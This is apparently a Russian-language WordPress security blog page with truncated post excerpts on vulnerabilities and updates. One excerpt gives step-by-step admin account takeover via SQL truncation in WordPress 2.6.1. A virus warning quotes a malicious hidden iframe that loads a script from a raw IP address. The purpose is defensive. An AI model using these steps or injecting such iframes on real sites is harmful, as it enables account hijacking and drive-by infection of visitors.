Уязвимость усечения данных в SQL Wordpress 2.6.1
Найдена новая уязвимость в Wordpress 2.6.1 которая заключается в ошибке усечения данных в базе SQL.
Идем по ссылке server.com/wp-login.php?action=register
Регистрируемся как пользователь "admin x" и Ваш email
Логин выглядит как admin[55 пробелов]х
После регистрации дубликата логина администратора, идем по ссылке восстановления пароля: server.com/wp-login.php?action=lostpassword
В форме восстановления пароля вводим email на который регистрировали дубликат логина администратора.
Получаем письмо с ссылкой на сброс [...]
Уязвимости в Contact Form ][ для Wordpress
Найдена уязвимость в плагинах контактной формы Wordpress - Contact Form версии 2.0.13 и ниже.
Плохая защита от ботов: отсутствие капчи, позволяет спам-ботам отправлять неограниченное количество спам-сообщений администратору сайта.
Использование функционала для рассылки спама: в форме контактов есть поле которое называется "Отправить копию самому себе", это настраивается в настройках плагина (CarbonCopy Ability), используя это поле, спам можно отправлять [...]
Секретные ключи в Wordpress 2.6
Продолжая тему о уязвимости секретного ключа в файле конфигурации Wordpress, хочу обратить ваше внимание на то, что в новой версии Wordpress 2.6, кроме строчки “SECRET_KEY“ есть еще две, на которые также необходимо обращать внимание при установке или обновлении Wordpress блога.
Строчки эти выглядят вот так:
define('AUTH_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.
define('SECURE_AUTH_KEY', 'впишите сюда [...]
Внимание вирус!
Вчера на одном из сайтов заказчиков, был обнаружен код, который определяется Google как вирусный код, все сайты которые содержат эту строчку, попадают сразу в категорию опасных сайтов, поэтому будьте внимательны и проверьте файлы своего сайта и посты, на наличие подобного кода.
<!-- Traffic Statistics --> <iframe src=хттп://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->
Если у [...]
Уязвимость Wordpress Plugin Download Manager 0.2
Уязвимость в данном скрипте, дает возможность атакующему закачать любой файл, на сервер. Это становится возможным из-за ошибки проверки входных данных в файле upload.php.
Исправления данной ошибки пока не существует, возможно будет выпущен патч, или ошибка будет исправлена в следующей версии Wordpress.
Пример использования данной уязвимости.
Wordpress 2.6 - еще больше безопасности
Вышла новая версия лучшего движка для блогов - Wordpress 2.6. В новой версии исправлено очень много ошибок и уязвимостей, а также проделано много работы для повышения безопасности блога.
Теперь после установки Wordpress на новый блог, по умолчанию протокол удаленной работы с блогом XML-RPC отключен, до тех пор, пока администратор блога не активирует его в настройках. Теоритически [...]
Обновлен плагин wp-no-version
Плагин предназначен для осложнения идентификации версии WordPress которая установлена на вашем блоге.
В последнем релизе, плагин не убирает отображение версии WordPress для зарегистрированных пользователей. Это было сделано, для поддержки функции автоматической проверки обновлений WordPress.
Скачать свежую версию плагина можно здесь.
Работоспособность плагина, проверена на WordPress 2.3.3.
Гостевой пост в блоге Антона Попова.
Вчера был размещен мой гостевой пост, на тему "Безопасность блогов WordPress" в блоге Антона Попова. Если вы совсем недавно заинтересовались безопасностью своего блога, обязательно ознакомьтесь.
В дальнейшем планируется более подробно рассмотреть все пункты по увеличению безопасности вашего блога, так что подписывайтесь на RSS и ждите обновлений.
Обновление безопасности WordPress MU 1.3.3
Выпущена новая версия мультипользовательской версии WordPress, в которой исправлена уязвимость в работе протокола XML-RPC.
Рекомендуется обновить движок или как минимум заменить файл xmlrpc.php
Срочное обновление безопасности WordPress 2.3.3
Сегодня было объявлено о выходе новой версии WordPress, в которой исправлена критическая уязвимость в работе протокола XML-RPC.
Скачать новую версию WordPress, можно на сайте разработчика.
Если вы не хотите полностью обновлять свой блог, можно просто скачать и обновить файл xmlrpc.php.
